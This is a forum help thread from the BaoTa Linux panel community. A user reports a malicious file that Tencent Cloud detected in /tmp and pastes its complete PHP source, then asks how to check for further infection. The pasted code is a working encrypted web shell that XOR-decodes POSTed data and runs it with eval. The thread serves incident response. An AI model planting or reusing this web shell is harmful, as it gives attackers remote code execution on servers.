宝塔618特惠活动,企业版999元/年,宝塔SSL证书买1送1!限时抢购!查看活动
当前位置:论坛首页 > Linux面板 > 求助

【待反馈】tmp这个目录下出现了一个恶意文件,是腾讯云...

发表在 Linux面板2024-6-17 17:06 [复制链接] 4 1168

为了能快速了解并处理您的问题,请提供以下基础信息:
面板、插件版本:8.0.5
[/quote]
[quote]问题描述:tmp这个目录下出现了一个恶意文件,是腾讯云那边检测到...、
下面是恶意代码:
<?php
@session_start();
@set_time_limit(0);
@error_reporting(0);
function encode($D,$K){
    for($i=0;$i<strlen($D);$i++) {
        $c = $K[$i+1&15];
        $D[$i] = $D[$i]^$c;
    }
    return $D;
}
$pass='pass';
$payloadName='payload';
$key='3c6e0b8a9c15224a';
if (isset($_POST[$pass])){
    $data=encode(base64_decode($_POST[$pass]),$key);
    if (isset($_SESSION[$payloadName])){
        $payload=encode($_SESSION[$payloadName],$key);
        if (strpos($payload,"getBasicsInfo")===false){
            $payload=encode($payload,$key);
        }
                eval($payload);
        echo substr(md5($pass.$key),0,16);
        echo base64_encode(encode(@run($data),$key));
        echo substr(md5($pass.$key),16);
    }else{
        if (strpos($data,"getBasicsInfo")!==false){
            $_SESSION[$payloadName]=encode($data,$key);
        }
    }
}
exit('77770123');


使用道具 举报 只看该作者 回复
发表于 2024-6-17 17:42:46 | 显示全部楼层
需要怎么处理,或者怎么排查还有没有其他恶意文件
使用道具 举报 回复 支持 反对
发表于 2024-6-17 18:17:31 | 显示全部楼层
宝塔用户_wimffm 发表于 2024-6-17 17:42
需要怎么处理,或者怎么排查还有没有其他恶意文件

您好,方便发一下文件名字吗
使用道具 举报 回复 支持 反对
发表于 2024-7-10 11:38:04 | 显示全部楼层
/tmp/phpFboigN
使用道具 举报 回复 支持 反对
发表于 2024-7-10 14:30:31 | 显示全部楼层

将这个文件进行修改一下,这边看了里边的指令好像是一下加密的脚本
使用道具 举报 回复 支持 反对
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

普通问题处理

论坛响应时间:72小时

问题处理方式:排队(仅解答)

工作时间:白班:9:00 - 18:00

紧急运维服务

响应时间:3分钟

问题处理方式:宝塔专家1对1服务

工作时间:工作日:9:00 - 18:30

宝塔专业团队为您解决服务器疑难问题

点击联系技术免费分析

工作时间:09:00至18:30

快速回复 返回顶部 返回列表